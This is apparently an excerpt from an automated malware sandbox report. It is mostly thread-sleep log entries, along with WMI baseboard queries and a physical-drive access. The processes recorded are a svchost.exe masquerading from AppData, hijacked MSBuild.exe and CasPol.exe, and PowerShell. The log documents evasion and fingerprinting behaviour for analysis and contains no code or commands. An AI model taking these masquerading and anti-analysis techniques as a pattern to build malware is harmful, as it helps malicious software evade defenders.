Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -70110s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -69891s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -69719s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -69585s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -69434s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -68594s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -68344s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -68139s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004	Thread sleep time: -67983s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 54924	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 48136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62680	Thread sleep count: 501 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -99840s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -99716s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -99547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -99344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -99210s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -99016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -98828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -98693s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -98563s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -98391s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -98224s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -98000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -97828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -97485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -97328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -97157s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -96953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -96823s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -96610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -96407s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -96250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -96078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -95860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -95625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640	Thread sleep time: -95391s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64404	Thread sleep count: 1452 > 30
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -99803s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -99512s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -99377s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -99194s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -99024s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -98755s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -98602s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -98478s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -98187s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -98042s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -97910s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -97719s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -97516s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -97211s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -96984s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -96848s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -96562s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -96383s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -95734s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -95328s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -95172s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -95027s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -94906s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -94764s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -94187s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -94024s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -93859s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -93687s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -93562s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -93422s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -93307s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -93137s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -92975s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -92851s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -92607s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -92460s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -92292s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -92131s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -91935s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -91784s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -91632s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -91490s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -91356s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -91172s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -90973s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -90765s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -90593s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -90443s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -90156s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -89640s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -87625s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -87218s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -86890s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -86687s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -86500s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -86343s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -86140s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -85812s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -85668s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -85328s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -85152s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -85025s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -84904s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -84768s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -84515s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -84356s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -84218s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -84044s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -83919s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -83625s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -83509s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -83343s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -83230s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -83078s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -82936s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -82806s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -82578s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -82437s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -82265s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -82095s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -81828s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -81547s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -81156s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -80953s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -80725s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -80578s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -80434s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -80234s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -80066s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -79890s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -79672s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -79487s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -78672s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -78422s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -78257s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -78120s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -77967s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -77781s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -77633s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -77482s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -77266s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -77063s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -76941s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -76750s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -76576s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -76391s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -76172s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -75875s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -75609s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -75359s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -75076s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -74750s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -74563s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -74374s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -74047s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -73719s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -73514s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -73281s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -73031s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -72777s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -72516s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -72188s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -71625s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -70000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -69748s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -69453s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -69156s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -68867s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -68469s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -68141s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -67922s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -67700s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -67469s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -67219s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -66969s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -66752s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -66586s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -66359s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -66190s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -66109s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -65875s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -65669s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -65490s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -65203s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -64875s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -64562s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -64312s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -64146s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -63953s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -63797s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -63375s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -63062s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -62859s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -62562s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -62219s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -61974s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -61745s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -61542s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -61359s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -61172s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -60999s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -60814s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -60645s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -60484s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -60322s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -60156s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -59984s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -59774s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -59562s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -59382s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -59203s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -59016s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -58828s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -58500s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -58312s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -58125s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -57937s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -57734s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -57516s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -57297s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -57109s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -56891s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -56672s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -56523s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -56311s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -56125s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -55906s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -55625s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -55444s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -55234s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -54859s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -52391s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -52016s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -51906s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -51703s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -51341s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -51156s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -50984s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -50818s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -50656s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -50459s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -50266s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -50104s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360	Thread sleep time: -49859s >= -30000s
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe TID: 47676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 66696	Thread sleep count: 1536 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 70016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 64920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 58276	Thread sleep count: 337 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -97891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -97594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -97360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -97047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -96781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -96578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -96266s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -96016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -95766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -95578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -95391s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -95109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -94875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464	Thread sleep time: -94716s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

